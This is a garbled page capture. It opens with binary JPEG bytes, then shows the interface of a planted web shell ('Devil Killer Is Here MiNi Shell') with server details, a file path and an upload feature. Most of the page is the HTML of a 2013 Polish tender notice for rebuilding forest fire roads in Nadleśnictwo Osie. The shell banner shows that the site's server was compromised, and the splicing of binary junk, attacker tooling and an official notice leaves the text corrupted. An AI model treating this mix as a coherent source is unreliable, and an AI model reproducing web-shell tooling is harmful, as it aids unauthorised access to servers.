JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130807/319112-N-2013.html

<p class="kh_header"><b>Osie: Przebudowa drogi leśnej, częściowo pożarowej nr 25 i 26 w Nadleśnictwie Osie.</b><br>
<b>Numer ogłoszenia: 319112 - 2013; data zamieszczenia: 07.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Osie , Rynek 11, 86-150 Osie, woj. kujawsko-pomorskie, tel. 52 3329503, faks 52 3329381.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Lasów Państwowych nie posiadająca osobowości prawnej..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi leśnej, częściowo pożarowej nr 25 i 26 w Nadleśnictwie Osie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przebudowa  drogi  leśnej, częściowo   pożarowej Nr 25 i 26 w  Nadleśnictwie  Osie w km 0 + 000 -    9 + 795  o długości : 9,795 km                                                                             
   1 Początek zadania od granicy pasa drogowego drogi powiatowej relacji Tleń -  
            Osie działka Nr 5130/4 . 
   2.  Koniec zadania w km 9 + 975 przedmiotowej drogi działka Nr 5029.                                                                                 
   3. Przedmiotowa  inwestycja położona jest na działkach o numerach ewidencyjnych:
            Leśnictwa: Osie, Stara Rzeka, Orli Dwór, Nowa Huta: 
            Działki Nr :5130/4, 5129/3, 5128/3, 5127/3, 5126/3, 5164; 5125/3, 5124/4, 5123/3,             
            5084, 5083, 5046, 5045, 5044/1, 5043/2, 5042, 5041, 5040, 5039, 5038; 5037/1,  
            5036/1, 5035/2, 5034A/4, 5034/1, 5033, 5032, 5031; 5030, 5029.
   4. Zakresem objęto następujące branżowe roboty drogowe :

a)	roboty przygotowawcze
- karczowanie pni drzew i krzaków,
- usunięcie  humusu

b)	podbudowa  drogi na ciągu podstawowym 
- profilowanie i zagęszczenie podłoża ulepszonego pospółką,
- roboty ziemne,
- wykonanie koryta na głębokość 10 cm,
- lokalnie - warstwa odsączająca,
- podbudowa zasadnicza z tłucznia betonowego  stabilizowanego mechanicznie             o uziarnieniu 0 - 63 mm grubości   18,0 cm po zagęszczeniu                                             km 0 + 000 - 2 + 047,
- podbudowa zasadnicza z tłucznia betonowego  stabilizowanego mechanicznie             o uziarnieniu 0 - 63 mm grubości   20,0 cm po zagęszczeniu                                      km 2 + 047 - 9 + 795                                       

c)	nawierzchnia drogi na ciągu podstawowym
- nawierzchnia żwirowa z pospółki o uziarnieniu 0 - 8 mm grubości 2,0 cm 

d)	mijanki 
- wykonanie koryta,
- podbudowa zasadnicza z tłucznia betonowego  stabilizowanego mechanicznie             o uziarnieniu 0 - 63 mm grubości   20,0 cm po zagęszczeniu ,
- nawierzchnia żwirowa z pospółki o uziarnieniu 0 - 8 mm grubości 2,0 cm 

e)	skrzyżowania i zjazdy
- wykonanie koryta,
- podbudowa zasadnicza z tłucznia betonowego  stabilizowanego mechanicznie             o uziarnieniu 0 - 63 mm grubości   20,0 cm po zagęszczeniu ,
- nawierzchnia żwirowa z pospółki o uziarnieniu 0 - 8 mm grubości 2,0 cm 

f)	przebudowa przepustu 
g)	pobocza i skarpy
h)	wodościeki



PARAMETRY PRZEDMIOTOWEJ  DROGI

Parametry techniczne 
      
- klasa drogi				                           -  droga leśna pożarowa
- kategoria ruchu:	
nośność co najmniej 10 ton i nacisku osi 5 ton  zgodnie z Rozporządzeniem Ministra                                               
              Środowiska z dnia 22 marca 2006 r. w sprawie szczegółowych zasad zabezpieczenia                   
              przeciwpożarowego lasów ( Dz. U. Nr 58, poz. 405 z późn. zm. ) .
              Przyjęto konstrukcję podbudowy i nawierzchni dla          -   KR 1
- prędkość projektowana				              -  Vp = 30 km/h
- prędkość miarodajna					  -  Vm = 30 km/h
- długość drogi				                          -  9,795 km
- szerokość  jezdni	km 0 + 000 - 2 + 047		              -  4,00 m      
- szerokość  jezdni km 2 + 047 - 5 + 150			  -  3,50 m
- szerokość  jezdni km 5 + 150 - 9 + 795			  -  3,00 m	 
- szerokość pobocza gruntowego                 		  -  2 x 0,50 m
- szerokość korony drogi   0 + 000 - 2 + 047                    -  5,00 m
- szerokość korony drogi   2 + 047  - 5 + 150		  -  4,50 m	
- szerokość korony drogi   5 + 150 - 9 + 795		  -  4,00 m                                      
- szerokość skrajni poziomej   			              -  6,00 m
- wysokość skrajni pionowej 				  -  4,00 m	
- długość mijanek                                                               -  23,0 m
- szerokość mijanek                                                            -   3,00 m
- skosy mijanek                                                                  -   1 : 7
- skrzyżowania i zjazdy                                                      - wg K P E D

Parametry fizyczne 

- długość drogi						-       9,795  km
- powierzchnia jezdni					-  32 984 ,00 m2
- długość przepustu 					-          11,00 m
- średnica przepustu					-          600 mm
- powierzchnia mijanek      				-   3 580 ,00 m2
- powierzchnia skrzyżowań i zjazdów 			-   2 206 ,00 m2	
- powierzchnia poboczy    				            -   9 971 ,00 m2 	
- wodościeki o wymiarach 2,0 m x 1,0m x 0,50 m	-          84 szt.  

Droga w przekroju poprzecznym                                                                               

Przewidywane obciążenie ruchem - do 12 osi obliczeniowych na dobę  80 - 100 kN  odpowiada kategorii KR 1:    
-     nośność co najmniej 10 ton i nacisku osi 5 ton  zgodnie z Rozporządzeniem Ministra                                               
      Środowiska z dnia 22 marca 2006 r. w sprawie szczegółowych zasad zabezpieczenia                   
     przeciwpożarowego lasów Dz. U. Nr 58, poz. 405 z późn. zm.  .
        Przyjęto następujące warstwy konstrukcyjne :

km 0 + 000 - 2 + 047   szerokość 4,00 m 
-  podbudowa zasadnicza z tłucznia betonowego  stabilizowanego mechanicznie               
  o uziarnieniu 0 - 63 mm grubości   18,0 cm po zagęszczeniu ,
- nawierzchnia żwirowa z pospółki o uziarnieniu 0 - 8 mm grubości 2,0 cm .

km 2 + 047 - 5 + 150 szerokość 3,50 m
- podbudowa zasadnicza z tłucznia betonowego  stabilizowanego mechanicznie               
  o uziarnieniu 0 - 63 mm grubości   20,0 cm po zagęszczeniu ,
- nawierzchnia żwirowa z pospółki o uziarnieniu 0 - 8 mm grubości 2,0 cm .

km 5 + 150 - 9 + 975 szerokość 3,00 m
-  podbudowa zasadnicza z tłucznia betonowego  stabilizowanego mechanicznie               
  o uziarnieniu 0 - 63 mm grubości   20,0 cm po zagęszczeniu ,
- nawierzchnia żwirowa z pospółki o uziarnieniu 0 - 8 mm grubości 2,0 cm .

   Szerokości oraz spadki poprzeczne jezdni, mijanek i poboczy podano na załączonym planie liniowym  i  przekrojach konstrukcyjnych.

MIJANKI

         W ciągu drogi zaprojektowano  28  szt.  mijanek   o długości 23,0 m , szerokości               3,00 m    i o skosach  1: 7 czyli 21,0 m .
         Konstrukcja podbudowy i nawierzchni taka sama jak na podstawowym ciągu drogowym:
- podbudowa zasadnicza z tłucznia betonowego  stabilizowanego mechanicznie             o uziarnieniu 0 - 63 mm grubości   20,0 cm po zagęszczeniu ,
- nawierzchnia żwirowa z pospółki o uziarnieniu 0 - 8 mm grubości 2,0 cm .
       W załączeniu tabelaryczne zestawienie lokalizacji i parametrów mijanek oraz rysunki konstrukcyjne.

SKRZYŻOWANIA I ZJAZDY

         W ciągu drogi zaprojektowano  16 szt. skrzyżowań pożarowych oraz  38 szt. zjazdów gospodarczych.
                  Konstrukcja podbudowy i nawierzchni taka sama jak na podstawowym ciągu drogowym:
- podbudowa zasadnicza z tłucznia betonowego  stabilizowanego mechanicznie             o uziarnieniu 0 - 63 mm grubości   20,0 cm po zagęszczeniu ,
- nawierzchnia żwirowa z pospółki o uziarnieniu 0 - 8 mm grubości 2,0 cm .
      W załączeniu tabelaryczne zestawienie lokalizacji,  parametrów skrzyżowań i zjazdów  oraz rysunki konstrukcyjne.

WODOŚCIEKI

           W ciągu drogi zaprojektowano 84 szt. wodościeków o wymiarach                               2,0 m x 1,0 m x 0,50 m przechwytujących wodę po większych opadach deszczu.
                   Lokalizację wodościeków przedstawia załączony  plan sytuacyjny                     oraz zestawienie tabelaryczne.

POBOCZA 

          Formowanie, plantowanie i zagęszczenie poboczy zaprojektowano w oparciu o wykorzystanie gruntu uzyskanego z koryta drogi, mijanek, skrzyżowań i zjazdów.
         Szerokości i spadki poprzeczne poboczy w załączeniu na planie liniowym i przekrojach konstrukcyjnych.

 PRZEPUST
 
           W  km 4 + 312  zlokalizowany jest betonowy przepust drogowy  o średnicy 500 mm              i długości 8,00 m zaprojektowany do przebudowy.
           Podstawowe parametry nowego przepustu :
- długość przepustu							- 11,0 m
- średnica przepustu 							- 600 mm
- rzędna wlotu przepustu						-  96,715 m              
- rzędna wylotu przepustu						-  96,660 m     
- ścianki czołowe 							- 2 szt.
- ściek betonowy wg KPED 01.03 					- 44 m
- umocnienie skarp płytami ażurowymi 				- 29 m2
- umocnienie dna rowu palisadą drewnianą				- 20 m
- poręcze drewniane 							- 24 m
        W załączeniu szczegółowe rysunki konstrukcyjne przepustu.   

UWAGI KOŃCOWE
1.	Planowane roboty nie wymagają zmiany granic pasa drogowego.
2.	Wycinkę drzew wykonuje  Inwestor, zaś karczowanie pni drzew  Wykonawca.
3.	Inwestor wskaże miejsce odwozu karpiny, gałęzi i humusu.
4.	Urobek gruntu uzyskany z robót ziemnych  KORYTO  należy wykorzystać na uzupełnienie poboczy.
5.	Wykonawca przedmiotowego zadania zobowiązany jest do zorganizowania                          i prowadzenia robót w sposób minimalizujący zniszczenie dróg dojazdowych gminnych i leśnych) na miejsce budowy  poprzez eksploatację  środków transportu  o nośności nieprzekraczającej  dopuszczalnych wartości dla poszczególnych kategorii dróg.
6.	Trasy przewozu materiałów należy uzgodnić z kompetencyjnymi zarządcami dróg .
7.	Po zakończeniu budowy Wykonawca jest zobowiązany do przywrócenia sieci dróg dojazdowych do stanu pierwotnego.


Roboty wykonywać w odpowiedniej kolejności zachowując przepisy BHP.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, stanowiących nie więcej niż 50% maksymalnej wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień w okresie 3 lat od udzielenia niniejszego zamówienia podstawowego, dotychczasowemu Wykonawcy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.25-2, 45.23.31.23-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 40000,00zł (słownie: czterdzieścitysięcy złotych)
Wadium może być wniesione w jednej lub kilku następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-rozliczeniowej z zastrzeżeniem, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. nr 42, poz. 275, z 2008 r. nr 116 poz730 i 732, nr 277 poz. 1505 oraz z 2010 r. nr 96 poz. 620).
Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego:
BS Osie nr 51 8169 0006 0010 5398 2000 0030 z dopiskiem na blankiecie przelewu  Przebudowa drogi leśnej, częściowo pożarowej nr 25 i 26 w Nadleśnictwie Osie
Wadium wnoszone w formie: poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy załączyć w formie oryginału do oferty lub zdeponować w kasie Zamawiającego.
 Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w ustawie Prawo zamówień publicznych.
Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert.  tj. do dnia 22.08.2013 r., do godz. 10:00
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego, tj. do dnia 22.08.2013 r., do godz. 10:00
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
Zamawiający zwraca wadium:
wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy
Na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie art.46 ust.1, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

Zamawiający zatrzymuje wadium wraz z odsetkami w przypadku, jeżeli Wykonawca, którego oferta została wybrana:
odmówi podpisania umowy na warunkach określonych w ofercie,
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Wadium wniesione w pieniądzu, Zamawiający przechowa na rachunku bankowym i zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie (potwierdzone dokumentami, że robota została wykonana należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, polegające na wykonaniu remontu, przebudowy lub budowy drogi o wartości nie mniejszej niż 800000,00 złotych brutto),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że osoby, którymi dysponuje do realizacji zamówienia, posiadają odpowiednie kwalifikacje i uprawnienia - warunek minimalny: posiadanie przez kierownika budowy uprawnień budowlanych do kierowania robotami drogowymi.
Poświadczone kopie uprawnień osób, które będą uczestniczyć w wykonywaniu zamówienia, Wykonawca przedłoży Zamawiającemu po wyborze oferty najkorzystniejszej, przed podpisaniem umowy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże posiadanie opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 800000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
